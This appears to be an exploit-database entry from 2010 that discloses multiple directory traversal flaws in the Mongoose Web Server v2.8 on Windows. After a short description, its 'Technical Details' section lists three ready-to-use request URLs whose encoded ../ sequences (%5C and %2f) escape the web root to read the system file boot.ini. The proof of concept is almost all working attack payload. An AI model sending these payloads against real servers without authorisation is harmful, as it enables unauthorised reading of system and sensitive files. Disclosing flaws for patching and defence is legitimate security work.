Mongoose Web Server v2.8 Multiple Directory Traversal Exploits

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mongoose Web Server v2.8 Multiple Directory Traversal Exploits
# Published : 2010-04-20
# Author : Dr_IDE
# Previous Title : MultiThreaded HTTP Server v1.1 Source Disclosure
# Next Title : Acritum Femitter v1.03 Directory Traversal Exploit

################################################################
#
# Mongoose Web Server v2.8 Multiple Directory Traversal Exploits
# Found By:             Dr_IDE
# Date:                 Apr. 20, 2010
# Tested On:            Windows 7
# Download:             http://code.google.com/p/mongoose/downloads/list
#
################################################################

- Description -

Mongoose v2.8 is a Windows based HTTP server. This is the latest
version of the application available.

Mongoose v2.8 is vulnerable to many  remote directory traversal attacks.

- Technical Details -
http://172.16.2.102//..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini
http://172.16.2.102/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
http://172.16.2.102/..%5C..%5Cboot.ini

#[pocoftheday.blogspot.com]